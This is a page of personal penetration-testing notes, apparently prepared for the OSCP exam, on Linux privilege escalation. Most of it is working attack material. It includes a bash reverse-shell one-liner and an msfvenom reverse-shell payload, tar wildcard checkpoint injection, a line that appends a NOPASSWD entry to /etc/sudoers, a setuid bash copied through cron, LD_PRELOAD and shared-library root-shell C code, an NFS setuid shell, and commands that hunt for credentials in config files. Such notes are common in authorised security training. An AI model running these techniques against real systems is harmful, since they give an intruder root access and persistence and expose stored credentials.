📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • Kernel Exploits
  • Cron Jobs
  • Special Permissions
  • Sudo Rights Abuse
  • PATH abuse
  • Wildcard Abuse
  • Credential Hunting
  • Environment Variable
  • LD_PRELOAD
  • LD_LIBERARY_PATH
  • Weak NFS Privileges
  • Weak file Permission
  1. Privilege Escalation

Linux PrivEsc

Kernel Exploits

# checking the Kernel level and Linux OS version.
uname -a
cat /etc/lsb-release

Cron Jobs

# Find world writables files or directories, look for uncommon files which can be leveraged to escalate privelges
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

# Find cron jobs
cat /etc/crontab

# Confirm the job is running using pspy - <https://github.com/DominicBreuker/pspy>
# The -pf flag tells the tool to print commands and file system events and -i 1000 tells it to scan profcs every 1000ms (or every second).
./pspy64 -pf -i 1000

# If a script is running by a root by a cron job and also writable by us then we can add ou reverse shell one liner to the script
bash -i >& /dev/tcp/ip/443 0>&1

  • If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.

    # Create a file with esame name as cron job in a directory writable by user which is also included in PATH
---
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
---

# make it executable and wait for cron jobto run and then try to execute the script
/tmp/rootbash –p

Special Permissions

Setuid Bit -

  • The Set User ID upon Execution(setuid) permission can allow a user to execute a program or script with the permissions of another user, typically with elevated privileges. The setuidbit appears as an s.

Setgid Bit -

  • The Set-Group-ID (setgid) permission is another special permission that allows us to run binaries as if we were part of the group that created them.

# find files with setuid bit set 
find / -user root -perm -4000 -exec ls -ldb {} \\; 2>/dev/null

# find files with setgid bit set
find / -user root -perm -6000 -exec ls -ldb {} \\; 2>/dev/null

# We can use GTFOBins to bypass security restrictions.

Sudo Rights Abuse

# Checking sudo rights of user
sudo -l

# Check GTFObins for any useful abuse

PATH abuse

# Checking PATH content
echo $PATH
env | grep PATH

# Adding to PATH variable
PATH=.:${PATH}
export PATH
echo $PATH

# If we want to run a file in our current directory without specifying path.
touch ls
echo 'echo "PATH ABUSE!!"' > ls
chmod +x ls

Wildcard Abuse

Character
Significance

*

An asterisk that can match any number of characters in a file name.

?

Matches a single character.

[ ]

Brackets enclose characters and can match any single one at the defined position.

~

A tilde at the beginning expands to the name of the user home

directory or can have another username appended to refer to that user's

home directory.

-

A hyphen within brackets will denote a range of characters.

# To add user to sudoers file
echo "eren ALL=(root) NOPASSWD: ALL" >> /etc/sudoers 

# Check if a command is run by any cron job or any script with wildacrd 
# create a reverse shell using msfvenom 
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=53 -f elf -o shell.elf

# Paste the reverse shell where the command is running from
# Create two files in the directory:
touch directory --checkpoint=1
touch directory --checkpoint-action=exec=shell.elf

# wait for job to run and get a root shell

Credential Hunting

# Finding Files which may contain credentials
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

cat wp-config.php | grep 'DB_USER\\|DB_PASSWORD'

# Also look for SSH Keys

Environment Variable

LD_PRELOAD

# List the programs your user is allowed to run via *sudo*
# Note if the env_keep option includes the LD_PRELOAD environment variable.

# Create c program to get a root shell
---
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setresuid(0,0,0);
	system("/bin/bash -p");
}
---

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

# Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:

LD_LIBERARY_PATH

# print the shared object required by a binary or shared object
ldd binary

# Checking RUNPATH configuration
readelf -d binary  | grep PATH

# Compile a shared object with below code to pop a root shell
---
#include<stdio.h>
#include<stdlib.h>

void dbquery() {
    printf("Malicious library loaded\\n");
    setuid(0);
    system("/bin/sh -p");
}
---
gcc src.c -fPIC -shared -o /development/libshared.so <--path where binary is located

Weak NFS Privileges

# List the mountable shares
showmount -e ip

# create a SETUID binary that executes /bin/sh using our local root user. We can then mount the /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit. 

shell.c
---
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}
---

# compile the binary
gcc shell.c -o shell

# Mount the share
sudo mount -t nfs ip:/tmp /mnt
cp shell /mnt
chmod u+s /mnt/shell

# Run the binary in low prvileged user shell
./shell

Weak file Permission

# Find Writable Directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null

# Find Writable Files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
PreviousOther ResourcesNextWindows PrivEsc

Last updated 2 years ago